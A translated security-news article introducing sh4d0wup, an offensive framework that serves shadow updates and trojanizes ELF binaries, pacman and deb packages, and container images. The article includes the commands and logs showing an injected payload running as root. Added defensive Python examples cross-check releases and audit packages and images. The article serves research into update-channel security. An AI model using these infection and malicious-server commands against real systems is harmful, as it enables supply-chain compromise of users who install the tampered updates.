sh4d0wup: a signing-key and update exploitation framework
2023-05-31 21:05:32 Author: FreeBuf

About sh4d0wup

Have you ever wondered whether the update you downloaded is the same one everyone else received, or a different one built just for you? sh4d0wup is a framework for exploiting signing keys and update mechanisms; its name is a play on "shadow update".

A shadow update is an update that does not officially exist, yet carries a valid signature and is therefore accepted by clients as genuine. This happens when the signing key has leaked to an attacker, or when a release engineer with legitimate access to the key decides to go rogue. Because the signature checks out, clients that rely on signature verification alone cannot distinguish a shadow update from a real one; only a second vantage point (another mirror, another client, a transparency log, a reproducible rebuild) can reveal that nobody else received the same bytes.

At its core sh4d0wup is an http/https update server that sits in front of the legitimate server as a reverse proxy and can infect and sign a range of tool, file and code formats. Researchers can use it to study and test whether the update mechanisms of their own systems are secure and robust against a compromised signing key.
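The following is an added example, not code from the page or from the sh4d0wup project, that models the shadow-update problem described above: a release signed with the publisher's key, a second release for the same version signed with the same (stolen) key, and a cross-check against independent witnesses that catches the one nobody else received. HMAC-SHA256 is used as a stand-in for the signature scheme so the example runs without third-party libraries (an assumption of this example, not how any real update channel signs); the key, manifests, payloads and witness records are all constructed.

```python
import hashlib
import hmac
import json

# Stand-in for the publisher's signing key. HMAC-SHA256 replaces a public-key
# signature purely to keep the example dependency-free (assumption of this
# example, not of any real update channel); the trust model is the same:
# whoever holds the key can produce tags that clients accept.
PUBLISHER_KEY = b"constructed-example-signing-key"


def canonical(manifest: dict) -> bytes:
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def sign(key: bytes, manifest: dict) -> str:
    return hmac.new(key, canonical(manifest), hashlib.sha256).hexdigest()


def verify(key: bytes, manifest: dict, sig: str) -> bool:
    return hmac.compare_digest(sign(key, manifest), sig)


def make_release(key: bytes, name: str, version: str, payload: bytes) -> tuple:
    """Build and sign a release manifest for `payload`."""
    manifest = {"name": name, "version": version,
                "sha256": hashlib.sha256(payload).hexdigest()}
    return manifest, sign(key, manifest)


def cross_check(manifest: dict, witnesses: dict) -> list:
    """Names of witnesses whose record of (name, version) disagrees with ours.

    A witness is any independent vantage point for the same release: another
    mirror, another client, a transparency log or a reproducible-builds rebuilder.
    A shadow update passes signature verification but fails this check, because
    it was only ever served to the target."""
    key = (manifest["name"], manifest["version"])
    return [w for w, seen in witnesses.items()
            if key in seen and seen[key] != manifest["sha256"]]


def run_scenario() -> dict:
    genuine = b"#!/bin/sh\necho updating\n"        # constructed: the real 1.2.0 update
    shadow = b"#!/bin/sh\nid\necho updating\n"     # constructed: same version, extra payload
    good_manifest, good_sig = make_release(PUBLISHER_KEY, "tool", "1.2.0", genuine)
    # The attacker holds the publisher key, so the shadow release is signed identically.
    shadow_manifest, shadow_sig = make_release(PUBLISHER_KEY, "tool", "1.2.0", shadow)
    # What everyone else saw for tool 1.2.0 (constructed witness records).
    witnesses = {
        "mirror-a": {("tool", "1.2.0"): good_manifest["sha256"]},
        "rebuilder": {("tool", "1.2.0"): good_manifest["sha256"]},
        "mirror-b": {("tool", "1.1.0"): "unrelated"},   # has no record of 1.2.0 yet
    }
    return {
        "genuine_verifies": verify(PUBLISHER_KEY, good_manifest, good_sig),
        "shadow_verifies": verify(PUBLISHER_KEY, shadow_manifest, shadow_sig),
        "forged_without_key_verifies": verify(
            PUBLISHER_KEY, shadow_manifest, sign(b"wrong key", shadow_manifest)),
        "genuine_disagreements": cross_check(good_manifest, witnesses),
        "shadow_disagreements": cross_check(shadow_manifest, witnesses),
    }


if __name__ == "__main__":
    for k, v in run_scenario().items():
        print(f"{k}: {v}")
```

Both releases verify, and only the witness comparison separates them; a witness that has not yet seen the version is deliberately not counted as a disagreement, so a fresh release is not flagged merely for being new.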

Download

Clone the project source to your machine:

git clone https://github.com/kpcyrd/sh4d0wup.git


Building a plot

Some plots are expensive to set up at run time, so a plot can be built ahead of time, with its signatures pre-generated, to avoid a long startup:

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

Running a plot

The following command starts a malicious HTTP update server according to the plot; `bait` also accepts the plot YAML file directly in place of the pre-built archive:

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

Example plot YAML files:

contrib/plot-archlinux.yaml: https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-archlinux.yaml

contrib/plot-debian.yaml: https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-debian.yaml

contrib/plot-rustup.yaml: https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-rustup.yaml

contrib/plot-curl-sh.yaml: https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-curl-sh.yaml

Infecting a file

sh4d0wup infect elf

The ELF mode compiles a new binary that runs the payload (here `id`) and then hands over to the original program; note the `uid=` line that appears before the wrapped program's own help output:

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>

Commands:
  bait         Start a malicious update server
  infect       High-level tampering: inject additional commands into a package
  tamper       Low-level tampering: patch a package database to add malicious packages, trigger updates or influence dependency resolution
  keygen       Generate signing keys with the given parameters
  sign         Use a signing key to generate signatures
  hsm          Interact with hardware signing keys
  build        Compile an attack based on a plot
  check        Check whether a plot can still execute
  completions  Generate shell completions
  help         Print this help

Options:
  -v, --verbose...  Enable debug output
  -h, --help        Print help

sh4d0wup infect pacman

The package had no install script, so one is added from scratch; the `id` payload then runs as root during `pacman -U`, between the upgrade step and the post-transaction hooks:

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...
Packages (1) sh4d0wup-0.2.0-2
Total Installed Size: 13.36 MiB
Net Upgrade Size:       0.00 MiB
:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflicts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk

sh4d0wup infect deb

Here `control.tar.xz` is patched and the version bumped so apt treats the file as an upgrade; the `id` payload runs as root during the package's setup step:

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: delaying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...
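Before installing a package file by hand, as in the `pacman -U` and `apt install ./...deb` runs above, a practitioner would want to see exactly which root-executing scripts the package carries. The following is an added example, not code from the page or from sh4d0wup, that extracts the install script (`.INSTALL`) and `pkgver` from a pacman package and the maintainer scripts (`preinst`/`postinst`/`prerm`/`postrm`) and `Version` from a .deb, using only the standard library (the .deb's outer `ar` container is parsed by hand). The sample packages it builds are constructed to look like the outputs above; they are not the real files from the page.

```python
import io
import os
import re
import tarfile
import tempfile

# Scripts that run as root when the package is installed or upgraded.
DEB_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
PACMAN_HOOKS = ("pre_install", "post_install", "pre_upgrade", "post_upgrade",
                "pre_remove", "post_remove")

def ar_members(data: bytes) -> dict:
    """Minimal reader for the ar(1) container that wraps a .deb."""
    if not data.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(data):
        hdr = data[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header")
        name = hdr[:16].decode().rstrip(" /")       # "control.tar.xz/" -> "control.tar.xz"
        size = int(hdr[48:58])
        members[name] = data[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)               # member data is padded to an even offset
    return members

def _tar_text(tf: tarfile.TarFile, name: str):
    """Return the text of `name` from the archive, tolerating a leading './'."""
    for m in tf.getmembers():
        plain = m.name[2:] if m.name.startswith("./") else m.name
        if m.isfile() and plain == name:
            return tf.extractfile(m).read().decode(errors="replace")
    return None

def inspect_deb(path: str) -> dict:
    with open(path, "rb") as f:
        members = ar_members(f.read())
    ctrl = next(v for k, v in members.items() if k.startswith("control.tar"))
    with tarfile.open(fileobj=io.BytesIO(ctrl)) as tf:  # gz/xz detected automatically
        control = _tar_text(tf, "control") or ""
        scripts = {s: _tar_text(tf, s) for s in DEB_SCRIPTS}
    ver = re.search(r"^Version:\s*(\S+)", control, re.M)
    return {"version": ver.group(1) if ver else None,
            "scripts": {k: v for k, v in scripts.items() if v is not None}}

def inspect_pacman(path: str) -> dict:
    # Real .pkg.tar.zst files need Python 3.14+ or the third-party zstandard
    # module; the constructed sample below is gzip-compressed so this runs anywhere.
    with tarfile.open(path) as tf:
        pkginfo = _tar_text(tf, ".PKGINFO") or ""
        hook = _tar_text(tf, ".INSTALL")
    ver = re.search(r"^pkgver\s*=\s*(\S+)", pkginfo, re.M)
    funcs = [f for f in PACMAN_HOOKS if hook and re.search(rf"^{f}\s*\(\)", hook, re.M)]
    return {"pkgver": ver.group(1) if ver else None, "hook_functions": funcs, "hook": hook}

def _tar_bytes(files: dict, comp: str) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:" + comp) as tf:
        for name, text in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(text.encode())
            tf.addfile(info, io.BytesIO(text.encode()))
    return buf.getvalue()

def _ar_bytes(members: list) -> bytes:
    out = b"!<arch>\n"
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode() + data
        out += b"\n" * (len(data) % 2)
    return out

def write_samples(directory: str) -> tuple:
    """Constructed packages shaped like the infected ones above: bumped version, root hook running 'id'."""
    deb = _ar_bytes([
        ("debian-binary", b"2.0\n"),
        ("control.tar.xz", _tar_bytes({"./control": "Package: apt\nVersion: 2.2.4-1\n",
                                       "./postinst": "#!/bin/sh\nid\n"}, "xz")),
        ("data.tar.xz", _tar_bytes({}, "xz")),
    ])
    pkg = _tar_bytes({".PKGINFO": "pkgname = sh4d0wup\npkgver = 0.2.0-2\n",
                      ".INSTALL": "post_upgrade() {\n  id\n}\n"}, "gz")
    deb_path = os.path.join(directory, "apt_2.2.4-1_amd64.deb")
    pkg_path = os.path.join(directory, "sh4d0wup-0.2.0-2-x86_64.pkg.tar.gz")
    for p, blob in ((deb_path, deb), (pkg_path, pkg)):
        with open(p, "wb") as f:
            f.write(blob)
    return deb_path, pkg_path

def audit_samples() -> dict:
    with tempfile.TemporaryDirectory() as d:
        deb_path, pkg_path = write_samples(d)
        return {"deb": inspect_deb(deb_path), "pacman": inspect_pacman(pkg_path)}

if __name__ == "__main__":
    print(audit_samples())
```

On a real system the same inspection can be done with `tar -xOf pkg.tar.zst .INSTALL` and `dpkg-deb -I pkg.deb postinst`; the value of doing it in code is that it can be wired into a pre-install gate that refuses packages whose scripts differ from the ones in the distribution's own copy of that version.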

sh4d0wup infect oci

For container images the tool appends a new layer named "patched" carrying the payload and rewrites the manifest and tags; the `id` payload then runs before the container's requested command:

% docker pull alpine:edge
% docker save alpine:edge > alpine-edge.tar
% sh4d0wup infect oci alpine-edge.tar infected.tar -c id -t infected:latest
[2022-12-12T00:31:17Z INFO sh4d0wup::infect::oci] Original image is referencing config "121d0da757518198deeb7d1df20aaae549834f8bc77195bbf5be1900c0144cff.json": LayerConfig { config: Some(Config { user: Some(""), exposed_ports: None, env: Some(["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]), entrypoint: None, cmd: Some(["/bin/sh"]), volumes: None, working_dir: Some(""), labels: None, stop_signal: None }), rootfs: Some(RootFs { type: "layers", diff_ids: ["sha256:2f7048230bc73ff091490aa5764f9c160d1a4efe04935da731a22e8d5fcccfcc"] }), extra: {"container_config": Object {"AttachStderr": Bool(false), "AttachStdin": Bool(false), "AttachStdout": Bool(false), "Cmd": Array [String("/bin/sh"), String("-c"), String("#(nop) "), String("CMD [\"/bin/sh\"]")], "Domainname": String(""), "Entrypoint": Null, "Env": Array [String("PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin")], "Hostname": String("457781b778a4"), "Image": String("sha256:28d4c3ce9341a318d475e64365e47a34d5b9ba6c670bed35ce90b2402296ead6"), "Labels": Object {}, "OnBuild": Null, "OpenStdin": Bool(false), "StdinOnce": Bool(false), "Tty": Bool(false), "User": String(""), "Volumes": Null, "WorkingDir": String("")}, "architecture": String("amd64"), "created": String("2022-11-10T20:19:29.043621251Z"), "history": Array [Object {"created": String("2022-11-10T20:19:28.834390785Z"), "created_by": String("/bin/sh -c #(nop) ADD file:51c4407dc777648e8ebc8e124b05feb1807699ade513b6006a9a409f6b0f6f51 in / ")}, Object {"created": String("2022-11-10T20:19:29.043621251Z"), "created_by": String("/bin/sh -c #(nop) CMD [\"/bin/sh\"]"), "empty_layer": Bool(true)}], "os": String("linux"), "docker_version": String("20.10.12"), "container": String("457781b778a449c9eac455ca1a18300a4041cb2b0d2d3f979460d19d7632ebf7")} }
[2022-12-12T00:31:17Z INFO sh4d0wup::infect::oci] Creating new layer in image: "patched"
[2022-12-12T00:31:17Z INFO sh4d0wup::infect::oci] Generating filesystem layer for payload: "id"
[2022-12-12T00:31:17Z INFO sh4d0wup::infect::oci] Updating tags of image to ["infected:latest"]
[2022-12-12T00:31:17Z INFO sh4d0wup::infect::oci] Writing modified manifest...
% docker load -i infected.tar
Loaded image: infected:latest
% docker run -it infected echo hello world
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
hello world
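A defender receiving a `docker save` tarball can check it against a trusted description of the image before loading it. The following is an added example, not code from the page or from sh4d0wup, that reads `manifest.json` and the image config from the tarball and reports layers that are not in a trusted `diff_ids` list, as well as changes to `Entrypoint` and `Cmd`. The trusted reference reuses the single alpine:edge layer digest printed in the log above; the sample tarballs, the extra-layer digest and the wrapper entrypoint in the infected sample are constructed for the example (the tool's log does not show how it invokes the payload, so the check flags both an extra layer and a changed start command).

```python
import hashlib
import io
import json
import os
import tarfile
import tempfile

# Trusted reference for alpine:edge, taken from the config dump in the tool's
# log output above (one layer, no entrypoint, cmd /bin/sh). In practice this
# would come from the registry manifest or a `docker inspect` of a known-good pull.
TRUSTED_ALPINE = {
    "diff_ids": ["sha256:2f7048230bc73ff091490aa5764f9c160d1a4efe04935da731a22e8d5fcccfcc"],
    "entrypoint": None,
    "cmd": ["/bin/sh"],
}


def _read_json(tf: tarfile.TarFile, name: str):
    return json.load(tf.extractfile(tf.getmember(name)))


def audit_image(path: str, trusted: dict) -> dict:
    """Compare a `docker save` tarball against a trusted layer list and start command."""
    with tarfile.open(path) as tf:
        manifest = _read_json(tf, "manifest.json")[0]      # first (only) image in the tarball
        config = _read_json(tf, manifest["Config"])
    diff_ids = config.get("rootfs", {}).get("diff_ids", [])
    cfg = config.get("config") or {}
    known = set(trusted["diff_ids"])
    return {
        "tags": manifest.get("RepoTags", []),
        "extra_layers": [d for d in diff_ids if d not in known],
        "missing_layers": [d for d in trusted["diff_ids"] if d not in diff_ids],
        "entrypoint_changed": cfg.get("Entrypoint") != trusted["entrypoint"],
        "cmd_changed": cfg.get("Cmd") != trusted["cmd"],
        "history_entries": len(config.get("history", [])),
    }


def write_sample_image(directory: str, infected: bool) -> str:
    """Constructed `docker save` tarball (manifest + config only; layer tars are not
    needed for this check). The infected variant carries an extra layer and a
    wrapper entrypoint that runs the payload before the requested command."""
    diff_ids = list(TRUSTED_ALPINE["diff_ids"])
    cfg = {"Entrypoint": None, "Cmd": ["/bin/sh"]}
    history = [{"created_by": "/bin/sh -c #(nop) ADD file:rootfs in /"}]
    if infected:
        diff_ids.append("sha256:" + "ab" * 32)           # constructed digest of the payload layer
        cfg["Entrypoint"] = ["/bin/sh", "-c", "id; exec \"$@\"", "--"]
        history.append({"created_by": "patched"})
    config = {"architecture": "amd64", "os": "linux", "config": cfg,
              "rootfs": {"type": "layers", "diff_ids": diff_ids}, "history": history}
    config_bytes = json.dumps(config).encode()
    config_name = hashlib.sha256(config_bytes).hexdigest() + ".json"
    manifest = [{"Config": config_name,
                 "RepoTags": ["infected:latest" if infected else "alpine:edge"],
                 "Layers": [d.split(":")[1] + "/layer.tar" for d in diff_ids]}]
    path = os.path.join(directory, ("infected" if infected else "clean") + ".tar")
    with tarfile.open(path, "w") as tf:
        for name, data in ((config_name, config_bytes),
                           ("manifest.json", json.dumps(manifest).encode())):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return path


def audit_samples() -> dict:
    with tempfile.TemporaryDirectory() as d:
        return {"clean": audit_image(write_sample_image(d, False), TRUSTED_ALPINE),
                "infected": audit_image(write_sample_image(d, True), TRUSTED_ALPINE)}


if __name__ == "__main__":
    for name, result in audit_samples().items():
        print(name, result)
```

The check deliberately compares `diff_ids` (digests of the uncompressed layer content) rather than tags or the config file name, since both of those are rewritten freely by the tool; a registry-signed manifest or a pinned `@sha256:` reference gives the same guarantee at pull time.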


License

This project is developed and released under the GPL-3.0 open-source license.

Project address

sh4d0wup: https://github.com/kpcyrd/sh4d0wup


Source: http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651226804&idx=4&sn=f5cec06082b686957060e52edc09da7e&chksm=bd1d103f8a6a992993c8548bbd12317c49fe56bb9259d2f617b9cab207147e21034ce7100eea#rd